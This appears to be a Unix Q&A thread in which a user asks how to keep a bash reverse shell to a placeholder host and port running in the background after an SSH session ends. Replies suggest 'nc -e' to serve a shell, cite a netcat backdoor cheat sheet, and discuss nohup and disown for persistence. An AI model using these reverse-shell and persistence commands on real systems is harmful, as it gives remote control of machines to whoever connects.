# Running 'bash -i >& /dev/tcp/HOST/PORT 0>&1' in the background

Tags: bash, io-redirection

I want to run `bash -i >& /dev/tcp/HOST/PORT 0>&1` in the background at server1. I want to listen to the connection and send commands back at `HOST/PORT`. So, tcpdump isn't sufficient for that.

I tried to run it in the background with:

`bash -i >& /dev/tcp/HOST/PORT 0>&1 &` and `nohup bash -i >& /dev/tcp/HOST/PORT 0>&1 & disown`

But the above commands  do not seem to work. I also tried,

`bg bash -i >& /dev/tcp/HOST/PORT 0>&1`

It also is not working.

Both don't allow me to connect to server1 properly when using `nc -l -vv -p PORT`.

It does work when I just run `bash -i >& /dev/tcp/HOST/PORT 0>&1`, but that will close this specific connection when I disconnect the SSH connection and it also does not allow me to enter new commands after this command.

Comment: What are you trying to achieve? Why do you want to run it in the background?

Comment: @TNW If it does not run in the background, it closes the connection when you disconnect your SSH connection. it also doesn't all you to enter new commands when running this command.

Comment: Why can't you just use netcat for both sides? Besides, just running command in background won't keep it running when you disconnect; you must either type `disown` after running the job or start it using `nohup` command.

Comment: @TNW Somehow disown and nohup don't keep it running either... And how would you run netcat in the background? Have you tried those commands yourself?

Answer (score 1):

I'm fairly certain your problem is that the *`-interactive`* operand expects a terminal and backgrounding the process cuts off its *`stdin/stdout`.* Consider using *[`nc ... -e`](https://www.google.com/url?sa=t&source=web&rct=j&ei=EYEzU8q6LIXtoASU44DwBQ&url=http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf&cd=6&ved=0CDcQFjAF&usg=AFQjCNE8C-EgYSm5zYDi6HBZtdNdMc0SpA&sig2=vmZ0H3nyVJtie3D1ArB9Yw)* to invoke the shell upon connection. The link there is a handy little *`netcat`* pdf cheatsheet. For *`-e`* see **BACKDOORS.** You'll probably need a GNU build of *`nc`* to use it - else you'll want to recompile.

Comment: What does '( ( commandhere ) & ) &'  actually do? It does not seem to work however... What is the full netcat command you suggest for running in the background?

Comment: Sorry about the backgrounded one... I didnt know if it would work in that form or not and working on dinner. Have a look at this for an explanation: http://unix.stackexchange.com/questions/121253/log-to-multiple-files-while-process-in-background-nohoup/121380#121380

Comment: @Juhan Made a minor edit - I mean to flesh this out a little soon, but of course youre free to downvote me if you dont find it sufficiently helpful as is. I apologize if thats the case.

Comment: How do you make sure netcat runs in the background when you close the SSH connection?

Comment: Can you explain a little better what it is youre trying to do? 0>&1 is almost definitely a problem especially because you already effectively 2>&1 with >&. You can tell netcat to background itself and just watch a port only to  execute a command upon connection with -l and -e and you can do much the same with ssh.

Comment: The other other post i linked to demonstrates something like a backpipe that might bt be useful to you here